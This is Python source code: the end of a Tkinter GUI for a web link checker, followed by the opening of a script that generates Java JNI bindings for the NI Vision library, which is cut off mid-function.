        self.__parent = parent
        self.__topcontrols = Frame(parent)
        self.__topcontrols.pack(side=TOP, fill=X)
        self.__label = Label(self.__topcontrols, text="Root URL:")
        self.__label.pack(side=LEFT)
        self.__rootentry = Entry(self.__topcontrols, width=60)
        self.__rootentry.pack(side=LEFT)
        self.__rootentry.bind('<Return>', self.enterroot)
        self.__rootentry.focus_set()
        self.__controls = Frame(parent)
        self.__controls.pack(side=TOP, fill=X)
        self.__running = 0
        self.__start = Button(self.__controls, text="Run", command=self.start)
        self.__start.pack(side=LEFT)
        self.__stop = Button(self.__controls, text="Stop", command=self.stop,
                             state=DISABLED)
        self.__stop.pack(side=LEFT)
        self.__step = Button(self.__controls, text="Check one",
                             command=self.step)
        self.__step.pack(side=LEFT)
        self.__cv = BooleanVar(parent)
        self.__cv.set(self.checkext)
        self.__checkext = Checkbutton(self.__controls, variable=self.__cv,
                                      command=self.update_checkext,
                                      text="Check nonlocal links",)
        self.__checkext.pack(side=LEFT)
        self.__reset = Button(self.__controls, text="Start over",
                              command=self.reset)
        self.__reset.pack(side=LEFT)
        if __name__ == '__main__':  # No Quit button under Grail!
            self.__quit = Button(self.__controls, text="Quit",
                                 command=self.__parent.quit)
            self.__quit.pack(side=RIGHT)
        self.__status = Label(parent, text="Status: initial", anchor=W)
        self.__status.pack(side=TOP, fill=X)
        self.__checking = Label(parent, text="Idle", anchor=W)
        self.__checking.pack(side=TOP, fill=X)
        self.__mp = mp = MultiPanel(parent)
        # Redirect stdout into the Log panel (LogPanel has a write() method).
        sys.stdout = self.__log = LogPanel(mp, "Log")
        self.__todo = ListPanel(mp, "To check", self, self.showinfo)
        self.__done = ListPanel(mp, "Checked", self, self.showinfo)
        self.__bad = ListPanel(mp, "Bad links", self, self.showinfo)
        self.__errors = ListPanel(mp, "Pages w/ bad links", self,
                                  self.showinfo)
        self.__details = LogPanel(mp, "Details")
        self.root_seed = None
        webchecker.Checker.__init__(self)
        if root:
            root = str(root).strip()
            if root:
                self.suggestroot(root)
        self.newstatus()

    def reset(self):
        # Clear checker state and all list panels; re-suggest the last root.
        webchecker.Checker.reset(self)
        for p in self.__todo, self.__done, self.__bad, self.__errors:
            p.clear()
        if self.root_seed:
            self.suggestroot(self.root_seed)

    def suggestroot(self, root):
        # Pre-fill (and select) the root entry without committing it.
        self.__rootentry.delete(0, END)
        self.__rootentry.insert(END, root)
        self.__rootentry.select_range(0, END)
        self.root_seed = root

    def enterroot(self, event=None):
        # Commit the entry-box content as a new root, if non-empty.
        root = self.__rootentry.get()
        root = root.strip()
        if root:
            self.__checking.config(text="Adding root "+root)
            self.__checking.update_idletasks()
            self.addroot(root)
            self.__checking.config(text="Idle")
            try:
                i = self.__todo.items.index(root)
            except (ValueError, IndexError):
                pass
            else:
                # Highlight the freshly-added root in the To-check panel.
                self.__todo.list.select_clear(0, END)
                self.__todo.list.select_set(i)
                self.__todo.list.yview(i)
        self.__rootentry.delete(0, END)

    def start(self):
        # Begin continuous checking (button states reflect running mode).
        self.__start.config(state=DISABLED, relief=SUNKEN)
        self.__stop.config(state=NORMAL)
        self.__step.config(state=DISABLED)
        self.enterroot()
        self.__running = 1
        self.go()

    def stop(self):
        self.__stop.config(state=DISABLED, relief=SUNKEN)
        self.__running = 0

    def step(self):
        # Check exactly one page, then return to idle.
        self.__start.config(state=DISABLED)
        self.__step.config(state=DISABLED, relief=SUNKEN)
        self.enterroot()
        self.__running = 0
        self.dosomething()

    def go(self):
        # Schedule the next unit of work via Tk's idle queue while running;
        # otherwise restore the idle button states.
        if self.__running:
            self.__parent.after_idle(self.dosomething)
        else:
            self.__checking.config(text="Idle")
            self.__start.config(state=NORMAL, relief=RAISED)
            self.__stop.config(state=DISABLED, relief=RAISED)
            self.__step.config(state=NORMAL, relief=RAISED)

    __busy = 0  # re-entrancy guard for dosomething()

    def dosomething(self):
        # Check one page: the selected To-check entry, or the first one.
        if self.__busy: return
        self.__busy = 1
        if self.todo:
            l = self.__todo.selectedindices()
            if l:
                i = l[0]
            else:
                i = 0
                self.__todo.list.select_set(i)
            self.__todo.list.yview(i)
            url = self.__todo.items[i]
            self.__checking.config(text="Checking "+self.format_url(url))
            self.__parent.update()
            self.dopage(url)
        else:
            self.stop()
        self.__busy = 0
        self.go()

    def showinfo(self, url):
        # Populate the Details panel for one URL (bound to double-click).
        d = self.__details
        d.clear()
        d.put("URL: %s\n" % self.format_url(url))
        if self.bad.has_key(url):
            d.put("Error: %s\n" % str(self.bad[url]))
        if url in self.roots:
            d.put("Note: This is a root URL\n")
        if self.done.has_key(url):
            d.put("Status: checked\n")
            o = self.done[url]
        elif self.todo.has_key(url):
            d.put("Status: to check\n")
            o = self.todo[url]
        else:
            d.put("Status: unknown (!)\n")
            o = []
        # url is a (page, fragment) pair; bad-link detail only applies to
        # whole pages (empty fragment).
        if (not url[1]) and self.errors.has_key(url[0]):
            d.put("Bad links from this page:\n")
            for triple in self.errors[url[0]]:
                link, rawlink, msg = triple
                d.put(" HREF %s" % self.format_url(link))
                if self.format_url(link) != rawlink:
                    d.put(" (%s)" % rawlink)
                d.put("\n")
                d.put(" error %s\n" % str(msg))
        self.__mp.showpanel("Details")
        for source, rawlink in o:
            d.put("Origin: %s" % source)
            if rawlink != self.format_url(url):
                d.put(" (%s)" % rawlink)
            d.put("\n")
        d.text.yview("1.0")

    # The following overrides forward to the base Checker and mirror the
    # change into the appropriate GUI panel.

    def setbad(self, url, msg):
        webchecker.Checker.setbad(self, url, msg)
        self.__bad.insert(url)
        self.newstatus()

    def setgood(self, url):
        webchecker.Checker.setgood(self, url)
        self.__bad.remove(url)
        self.newstatus()

    def newlink(self, url, origin):
        webchecker.Checker.newlink(self, url, origin)
        if self.done.has_key(url):
            self.__done.insert(url)
        elif self.todo.has_key(url):
            self.__todo.insert(url)
        self.newstatus()

    def markdone(self, url):
        webchecker.Checker.markdone(self, url)
        self.__done.insert(url)
        self.__todo.remove(url)
        self.newstatus()

    def seterror(self, url, triple):
        webchecker.Checker.seterror(self, url, triple)
        self.__errors.insert((url, ''))
        self.newstatus()

    def newstatus(self):
        self.__status.config(text="Status: "+self.status())
        self.__parent.update()

    def update_checkext(self):
        # Sync the "Check nonlocal links" checkbox into the Checker flag.
        self.checkext = self.__cv.get()


class ListPanel:
    # A named, auto-hiding listbox panel holding URLs; double-click shows
    # details via the supplied showinfo callback.

    def __init__(self, mp, name, checker, showinfo=None):
        self.mp = mp
        self.name = name
        self.showinfo = showinfo
        self.checker = checker
        self.panel = mp.addpanel(name)
        self.list, self.frame = tktools.make_list_box(
            self.panel, width=60, height=5)
        self.list.config(exportselection=0)
        if showinfo:
            self.list.bind('<Double-Button-1>', self.doubleclick)
        self.items = []

    def clear(self):
        self.items = []
        self.list.delete(0, END)
        self.mp.hidepanel(self.name)

    def doubleclick(self, event):
        l = self.selectedindices()
        if l:
            self.showinfo(self.items[l[0]])

    def selectedindices(self):
        l = self.list.curselection()
        if not l: return []
        return map(int, l)

    def insert(self, url):
        if url not in self.items:
            if not self.items:
                # First item: make the panel visible again.
                self.mp.showpanel(self.name)
            # (I tried sorting alphabetically, but the display is too jumpy)
            i = len(self.items)
            self.list.insert(i, self.checker.format_url(url))
            self.list.yview(i)
            self.items.insert(i, url)

    def remove(self, url):
        try:
            i = self.items.index(url)
        except (ValueError, IndexError):
            pass
        else:
            was_selected = i in self.selectedindices()
            self.list.delete(i)
            del self.items[i]
            if not self.items:
                self.mp.hidepanel(self.name)
            elif was_selected:
                # Keep a selection alive by moving it to a neighbour.
                if i >= len(self.items):
                    i = len(self.items) - 1
                self.list.select_set(i)


class LogPanel:
    # A scrolling text panel; write() makes it usable as a sys.stdout
    # replacement.

    def __init__(self, mp, name):
        self.mp = mp
        self.name = name
        self.panel = mp.addpanel(name)
        self.text, self.frame = tktools.make_text_box(self.panel, height=10)
        self.text.config(wrap=NONE)

    def clear(self):
        self.text.delete("1.0", END)
        self.text.yview("1.0")

    def put(self, s):
        self.text.insert(END, s)
        if '\n' in s:
            self.text.yview(END)

    def write(self, s):
        self.text.insert(END, s)
        if '\n' in s:
            self.text.yview(END)
        # Unlike put(), also pump the event loop so output appears promptly.
        self.panel.update()


class MultiPanel:
    # Container managing named sub-panels, each toggled by a checkbutton.

    def __init__(self, parent):
        self.parent = parent
        self.frame = Frame(self.parent)
        self.frame.pack(expand=1, fill=BOTH)
        self.topframe = Frame(self.frame, borderwidth=2, relief=RAISED)
        self.topframe.pack(fill=X)
        self.botframe = Frame(self.frame)
        self.botframe.pack(expand=1, fill=BOTH)
        self.panelnames = []
        self.panels = {}

    def addpanel(self, name, on=0):
        # Register a new panel; `on` controls initial visibility.  The
        # checkbutton's StringVar holds the panel name when visible, "" when
        # hidden.
        v = StringVar(self.parent)
        if on:
            v.set(name)
        else:
            v.set("")
        check = Checkbutton(self.topframe, text=name,
                            offvalue="", onvalue=name, variable=v,
                            command=self.checkpanel)
        check.pack(side=LEFT)
        panel = Frame(self.botframe)
        label = Label(panel, text=name, borderwidth=2, relief=RAISED, anchor=W)
        label.pack(side=TOP, fill=X)
        t = v, check, panel
        self.panelnames.append(name)
        self.panels[name] = t
        if on:
            panel.pack(expand=1, fill=BOTH)
        return panel

    def showpanel(self, name):
        v, check, panel = self.panels[name]
        v.set(name)
        panel.pack(expand=1, fill=BOTH)

    def hidepanel(self, name):
        v, check, panel = self.panels[name]
        v.set("")
        panel.pack_forget()

    def checkpanel(self):
        # Repack all visible panels in registration order: unpack everything,
        # then pack those whose checkbutton variable is set.
        for name in self.panelnames:
            v, check, panel = self.panels[name]
            panel.pack_forget()
        for name in self.panelnames:
            v, check, panel = self.panels[name]
            if v.get():
                panel.pack(expand=1, fill=BOTH)


if __name__ == '__main__':
    main()
apache-2.0
Kevin-OConnor/allwpilib
wpilibj/src/athena/cpp/nivision/gen_java.py
3
80172
from __future__ import print_function import codecs import os import sys try: import configparser except ImportError: import ConfigParser as configparser from nivision_parse import * # base, cast-out-pre, cast-out-post, cast-in-pre, cast-in-post java_accessor_map = { "B": ("", "", "", "", ""), "C": ("Char", "", "", "", ""), "S": ("Short", "", "", "", ""), "I": ("Int", "", "", "", ""), "J": ("Long", "", "", "", ""), "F": ("Float", "", "", "", ""), "D": ("Double", "", "", "", ""), "Z": ("Boolean", "", "", "", ""), "X": ("", "(short)(", " & 0xff)", "(byte)(", " & 0xff)"), "Y": ("Short", "(int)(", " & 0xffff)", "(short)(", " & 0xffff)"), } java_size_map = { "B": 1, "C": 2, "S": 2, "I": 4, "J": 8, "F": 4, "D": 8, "Z": 1, } class JavaType: def __init__(self, j_type, jn_type, jni_type, jni_sig, is_enum=False, is_struct=False, is_opaque=False, string_array=False, array_size=None): self.j_type = j_type self.jn_type = jn_type self.jni_type = jni_type self.jni_sig = jni_sig self.is_enum = is_enum self.is_struct = is_struct self.is_opaque = is_opaque self.string_array = string_array self.array_size = array_size def copy(self): return JavaType(self.j_type, self.jn_type, self.jni_type, self.jni_sig, is_enum=self.is_enum, is_struct=self.is_struct, is_opaque=self.is_opaque, string_array=self.string_array, array_size=self.array_size) def __repr__(self): return "JavaType(%s, %s, %s, %s, is_enum=%s, is_struct=%s, is_opaque=%s, string_array=%s, array_size=%s)" % ( self.j_type, self.jn_type, self.jni_type, self.jni_sig, self.is_enum, self.is_struct, self.is_opaque, self.string_array, self.array_size) java_types_map = { ("void", None): JavaType("void", "void", "void", None), ("env", None): JavaType("", "", "JNIEnv*", None), ("cls", None): JavaType("", "", "jclass", None), ("int", None): JavaType("int", "int", "jint", "I"), ("char", None): JavaType("byte", "byte", "jbyte", "B"), ("wchar_t", None): JavaType("char", "char", "jchar", "C"), ("unsigned char", None): JavaType("short", "short", 
"jshort", "X"), ("short", None): JavaType("short", "short", "jshort", "S"), ("unsigned short", None): JavaType("int", "int", "jint", "Y"), ("unsigned", None): JavaType("int", "int", "jint", "I"), ("unsigned int", None): JavaType("int", "int", "jint", "I"), ("uInt32", None): JavaType("int", "int", "jint", "I"), ("IMAQdxSession", None): JavaType("int", "int", "jint", "I"), ("bool32", None): JavaType("int", "int", "jint", "I"), ("long", None): JavaType("long", "long", "jlong", "J"), ("unsigned long", None): JavaType("long", "long", "jlong", "J"), ("__int64", None): JavaType("long", "long", "jlong", "J"), ("long long", None): JavaType("long", "long", "jlong", "J"), ("unsigned __int64", None): JavaType("long", "long", "jlong", "J"), ("__uint64", None): JavaType("long", "long", "jlong", "J"), ("unsigned long long", None): JavaType("long", "long", "jlong", "J"), ("float", None): JavaType("float", "float", "jfloat", "F"), ("double", None): JavaType("double", "double", "jdouble", "D"), ("long double", None): JavaType("double", "double", "jdouble", "D"), ("unsigned char*", None): JavaType("String", "String", "jstring", "Ljava/lang/String;"), ("char*", None): JavaType("String", "String", "jstring", "Ljava/lang/String;"), ("void*", None): JavaType("RawData", "long", "jlong", "J", is_opaque=True), # ("size_t", None): JavaType("long", "long", "jlong", "J"), ("String255", None): JavaType("String", "String", "jstring", "Ljava/lang/String;", string_array=True, array_size="256"), ("String255", ""): JavaType("String[]", "String[]", "jstringArray", "[Ljava/lang/String;", string_array=True, array_size="256"), ("char*", ""): JavaType("String[]", "String[]", "jstringArray", "[Ljava/lang/String;"), ("char", ""): JavaType("String", "String", "jstring", "Ljava/lang/String;", string_array=True, array_size=""), ("unsigned char", ""): JavaType("byte[]", "byte[]", "jbyteArray", "[B"), ("short", ""): JavaType("short[]", "short[]", "jshortArray", "[S"), ("int", ""): JavaType("int[]", "int[]", 
"jintArray", "[I"), ("unsigned int", ""): JavaType("int[]", "int[]", "jintArray", "[I"), ("uInt32", ""): JavaType("int[]", "int[]", "jintArray", "[I"), ("long", ""): JavaType("long[]", "long[]", "jlongArray", "[J"), ("float", ""): JavaType("float[]", "float[]", "jfloatArray", "[F"), ("double", ""): JavaType("double[]", "double[]", "jdoubleArray", "[D"), } def c_to_jtype(name, arr): jtype = java_types_map.get((name, arr), None) if jtype is not None: return jtype # sized array is treated the same as unsized if arr is not None and arr != "": jtype = c_to_jtype(name, "").copy() jtype.array_size = arr java_types_map[(name, arr)] = jtype # cache return jtype # Opaque structures if name in opaque_structs: if arr is None: jtype = JavaType(name, "long", "jlong", "J", is_opaque=True) else: # FIXME jtype = JavaType(name + "[]", "long[]", "jlongArray", "[J", is_opaque=True) java_types_map[(name, arr)] = jtype # cache return jtype # Enums if name in enums: if arr is None: jtype = JavaType(name, "int", "jint", "I", is_enum=True) else: # FIXME jtype = JavaType(name + "[]", "int[]", "jintArray", "[I", is_enum=True) java_types_map[(name, arr)] = jtype # cache return jtype # handle pointers as void* (FIXME) if name[-1] == '*': if name[:-1] not in structs and name[:-1] not in defined: return java_types_map[("void*", None)] return c_to_jtype(name[:-1], arr) # Otherwise it's a normal structure object if arr is None: jtype = JavaType(name, "long", "jlong", "J", is_struct=True) else: # FIXME jtype = JavaType(name + "[]", "long[]", "jlongArray", "[J", is_struct=True) java_types_map[(name, arr)] = jtype return jtype class JavaEmitData: def __init__(self): self.construct = [] self.backingRead = [] self.read = [] self.writeBufs = [] self.write = [] self.backingWrite = [] self.toArg = "" def addConstruct(self, s): self.construct.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) def addBackingRead(self, s): self.backingRead.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) def addRead(self, s): 
self.read.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) def addWriteBuf(self, s): self.writeBufs.append(s) def addWrite(self, s): self.write.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) def addBackingWrite(self, s): self.backingWrite.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) class JavaEmitArrayData(JavaEmitData): def __init__(self): JavaEmitData.__init__(self) self.addConstruct("{fname} = new {ftype_one}[0];") self.addBackingRead("int {size_fname} = {backing}.get{jaccessor}({size_foffset});") self.addBackingWrite("{backing}.put{jaccessor}({size_foffset}, {fname}.length);") # sized array of null-terminated strings strzArrayEmitSized = JavaEmitArrayData() strzArrayEmitSized.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") strzArrayEmitSized.addRead(""" {fname} = new String[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, {size_fname}*{pointer_sz}); for (int i=0, off=0; i<{size_fname}; i++, off += {pointer_sz}) {{ long addr = getPointer(bb, off); if (addr == 0) {fname}[i] = null; else {{ ByteBuffer bb2 = newDirectByteBuffer(addr, 1000); // FIXME while (bb2.get() != 0) {{}} byte[] bytes = new byte[bb2.position()-1]; bb2.rewind(); getBytes(bb2, bytes, 0, bytes.length); try {{ {fname}[i] = new String(bytes, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname}[i] = ""; }} }} }} }}""") strzArrayEmitSized.addWriteBuf("{buftype} {fname}_buf") strzArrayEmitSized.addWriteBuf("{buftype}[] {fname}_bufs") strzArrayEmitSized.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*{pointer_sz}).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += {pointer_sz}) {{ if ({fname}[i] == null) putPointer({fname}_buf, off, 0); else {{ byte[] bytes; try {{ bytes = {fname}[i].getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ bytes = new byte[0]; }} {fname}_bufs[i] = ByteBuffer.allocateDirect(bytes.length+1); 
putBytes({fname}_bufs[i], bytes, 0, bytes.length).put(bytes.length, (byte)0); putPointer({fname}_buf, off, getByteBufferAddress({fname}_bufs[i])); }} }}""") strzArrayEmitSized.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") # unsized array; final terminating zero determines the length strzArrayEmitUnsized = JavaEmitData() strzArrayEmitUnsized.addConstruct("{fname} = new {ftype_one}[0];") strzArrayEmitUnsized.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") strzArrayEmitUnsized.addRead(""" {{ if ({fname}_addr == 0) {fname} = new {ftype_one}[0]; else {{ // prescan to find length ByteBuffer bb = newDirectByteBuffer({fname}_addr, 1000*{pointer_sz}); // FIXME int size = 0; for (int off=0; getPointer(bb, off) != 0; size++, off += {pointer_sz}) {{ }} {fname} = new String[size]; for (int i=0, off=0; i<size; i++, off += {pointer_sz}) {{ long addr = getPointer(bb, off); if (addr == 0) {fname}[i] = null; else {{ ByteBuffer bb2 = newDirectByteBuffer(addr, 1000); // FIXME while (bb2.get() != 0) {{}} byte[] bytes = new byte[bb2.position()-1]; bb2.rewind(); getBytes(bb2, 0, bytes.length); try {{ {fname}[i] = new String(bytes, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname}[i] = ""; }} }} }} }} }}""") strzArrayEmitUnsized.addWriteBuf("{buftype} {fname}_buf") strzArrayEmitUnsized.addWriteBuf("{buftype}[] {fname}_bufs") strzArrayEmitUnsized.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect(({fname}.length+1)*{pointer_sz}).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += {pointer_sz}) {{ if ({fname}[i] == null) putPointer({fname}_buf, off, 0); else {{ byte[] bytes; try {{ bytes = {fname}[i].getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ bytes = new byte[0]; }} {fname}_bufs[i] = ByteBuffer.allocateDirect(bytes.length+1); putBytes({fname}_bufs[i], bytes, 0, bytes.length).put(bytes.length, (byte)0); putPointer({fname}_buf, off, getByteBufferAddress({fname}_bufs[i])); }} }} 
putPointer({fname}_buf, {fname}.length*{pointer_sz}, 0); // terminator""") strzArrayEmitUnsized.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") # array of enum values enumArrayEmit = JavaEmitArrayData() enumArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") enumArrayEmit.addRead(""" {fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, {size_fname}*%d); for (int i=0, off=0; i<{size_fname}; i++, off += %d) {{ {fname}[i] = {ftype_one}.fromValue(bb.getInt(off)); }} }}""" % (4, 4)) enumArrayEmit.addWriteBuf("{buftype} {fname}_buf") enumArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*%d).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += %d) {{ if ({fname} != null) {fname}_buf.putInt(off, {fname}[i].getValue()); }}""" % (4, 4)) enumArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") enumArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # array of opaque structures opaqueArrayEmit = JavaEmitArrayData() opaqueArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") opaqueArrayEmit.addRead(""" {fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, {size_fname}*{pointer_sz}); for (int i=0, off=0; i<{size_fname}; i++, off += {pointer_sz}) {{ {fname}[i] = new {ftype_one}(getPointer(bb, off), false); }} }}""") opaqueArrayEmit.addWriteBuf("{buftype} {fname}_buf") opaqueArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*{pointer_sz}).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += {pointer_sz}) {{ putPointer({fname}_buf, off, {fname}[i]); }}""") opaqueArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") opaqueArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # array of 
String255 string255ArrayEmit = JavaEmitArrayData() string255ArrayEmit.addBackingRead(""" {fname} = new String[{size_fname}]; if ({size_fname} > 0) {{ byte[] bytes = new byte[%d]; int len; for (int i=0, off={foffset}; i<{size_fname}; i++, off += %d) {{ getBytes({backing}, bytes, off, %d); for (len=0; len<bytes.length && bytes[len] != 0; len++) {{}} try {{ {fname}[i] = new String(bytes, 0, len, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname}[i] = ""; }} }} }}""" % (256, 256, 256)) string255ArrayEmit.addBackingWrite(""" for (int i=0, off={foffset}; i<{size_fname}; i++, off += %d) {{ byte[] bytes; try {{ bytes = {fname}.getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ bytes = new byte[0]; }} putBytes({backing}, bytes, off, bytes.length); for (int i=bytes.length; i<%d; i++) {backing}.put(off+i, (byte)0); // fill with zero }}""" % (256, 256)) # array of normal structures structArrayEmit = JavaEmitArrayData() structArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") structArrayEmit.addRead(""" {fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, {size_fname}*{struct_sz}); for (int i=0, off=0; i<{size_fname}; i++, off += {struct_sz}) {{ {fname}[i] = new {ftype_one}(bb, off); {fname}[i].read(); }} }}""") structArrayEmit.addWriteBuf("{buftype} {fname}_buf") # FIXME: This can be optimized for the read->write case. 
structArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*{struct_sz}).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += {struct_sz}) {{ {fname}[i].setBuffer({fname}_buf, off); {fname}[i].write(); }}""") structArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") structArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # array of bytes byteArrayEmit = JavaEmitArrayData() byteArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") byteArrayEmit.addRead(""" {fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ getBytes(newDirectByteBuffer({fname}_addr, {size_fname}), {fname}, 0, {size_fname}); }}""") byteArrayEmit.addWriteBuf("{buftype} {fname}_buf") byteArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length); putBytes({fname}_buf, {fname}, 0, {fname}.length);""") byteArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") byteArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # array of java types jtypeArrayEmit = JavaEmitArrayData() jtypeArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") jtypeArrayEmit.addRead("""{fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ newDirectByteBuffer({fname}_addr, {size_fname}*{struct_sz}).as{buftype}().get({fname}); }}""") jtypeArrayEmit.addWriteBuf("ByteBuffer {fname}_buf") jtypeArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*{struct_sz}).order(ByteOrder.nativeOrder()); {fname}_buf.as{buftype}().put({fname}).rewind();""") jtypeArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") jtypeArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # enum enumEmit = JavaEmitData() enumEmit.addBackingRead("{fname} = {ftype}.fromValue({backing}.getInt({foffset}));") enumEmit.addBackingWrite("""if ({fname} != null) {backing}.putInt({foffset}, 
{fname}.getValue());""") enumEmit.toArg = "{fname}.getValue()" # opaque structure opaqueEmit = JavaEmitData() opaqueEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") opaqueEmit.addRead("""if ({fname}_addr == 0) {fname} = null; else {fname} = new {ftype}({fname}_addr, false);""") opaqueEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname});") opaqueEmit.toArg = "{fname}.getAddress()" # inline normal structure structEmit = JavaEmitData() structEmit.addConstruct("{fname} = new {ftype}({backing}, {foffset});") structEmit.addRead("{fname}.read();") structEmit.addWrite("{fname}.write();") structEmit.toArg = "{fname}.getAddress()" # java type jtypeEmit = JavaEmitData() jtypeEmit.addBackingRead( "{fname} = {jaccessor_cast_out_pre}{backing}.get{jaccessor}({foffset}){jaccessor_cast_out_post};") jtypeEmit.addBackingWrite( "{backing}.put{jaccessor}({foffset}, {jaccessor_cast_in_pre}{fname}{jaccessor_cast_in_post});") # string - array of characters strSizedEmit = JavaEmitData() strSizedEmit.addBackingRead("""{{ byte[] bytes = new byte[{array_size}]; getBytes({backing}, bytes, {foffset}, {array_size}); int len; for (len=0; len<bytes.length && bytes[len] != 0; len++) {{}} try {{ {fname} = new String(bytes, 0, len, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname} = ""; }} }}""") strSizedEmit.addBackingWrite(""" if ({fname} != null) {{ byte[] bytes; try {{ bytes = {fname}.getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ bytes = new byte[0]; }} putBytes({backing}, bytes, {foffset}, bytes.length); for (int i=bytes.length; i<{array_size}; i++) {backing}.put(i, (byte)0); // fill with zero }}""") # null terminated string strzEmit = JavaEmitData() strzEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") strzEmit.addRead("""if ({fname}_addr == 0) {fname} = null; else {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, 1000); // FIXME while (bb.get() != 0) {{}} byte[] bytes = new 
byte[bb.position()-1]; getBytes(bb, bytes, 0, bytes.length); try {{ {fname} = new String(bytes, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname} = ""; }} }} """) strzEmit.addWriteBuf("{buftype} {fname}_buf") strzEmit.addWrite(""" if ({fname} != null) {{ byte[] {fname}_bytes; try {{ {fname}_bytes = {fname}.getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname}_bytes = new byte[0]; }} {fname}_buf = ByteBuffer.allocateDirect({fname}_bytes.length+1); putBytes({fname}_buf, {fname}_bytes, 0, {fname}_bytes.length).put({fname}_bytes.length, (byte)0); }}""") strzEmit.addBackingWrite( "putPointer({backing}, {foffset}, {fname} == null ? 0 : getByteBufferAddress({fname}_buf));") strzEmit.toArg = "{fname} == null ? 0 : getByteBufferAddress({fname}_buf)" class JavaStructEmitHelper: def __init__(self, emit, name, fields, sized_members=None): self.emit = emit self.name = name self.fields = fields self.exclude_members = set(self.config_get("exclude_members", "").split(',')) self.exclude_members |= set( x.split(':')[0] for x in self.config_get("uniontype", "").split(',')) self.union_members = {} for v in self.config_get("uniontype", "").split(','): if not v: continue vl = v.split(':') self.union_members[vl[0]] = ( vl[1], [tuple(y.strip() for y in x.split('=')) for x in vl[2:]]) if sized_members is not None: self.sized_members = sized_members else: self.sized_members = dict(tuple(y.strip() for y in x.split(':')) for x in self.config_get("arraysize", "").split(',') if x) self.size_members = dict((x, None) for x in self.sized_members.values()) # get type of each sized member for fname, ftype, arr, comment in fields: if fname in self.size_members: self.size_members[fname] = ftype def config_get(self, option, fallback): return self.emit.config_get(self.name, option, fallback) def config_getboolean(self, section, option, fallback): return self.emit.config_getboolean(self.name, option, fallback) def config_struct_get(self, option): return 
